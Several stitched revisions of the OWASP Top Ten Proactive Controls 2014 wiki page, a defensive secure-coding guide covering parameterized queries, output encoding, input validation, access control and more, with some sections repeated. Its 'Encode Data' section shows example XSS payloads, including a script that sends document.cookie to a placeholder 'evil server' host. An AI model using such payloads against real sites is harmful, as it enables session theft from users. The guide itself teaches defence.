'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176347OWASP Proactive Controls2014-06-03T15:36:26Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176253OWASP Proactive Controls2014-06-02T15:58:47Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
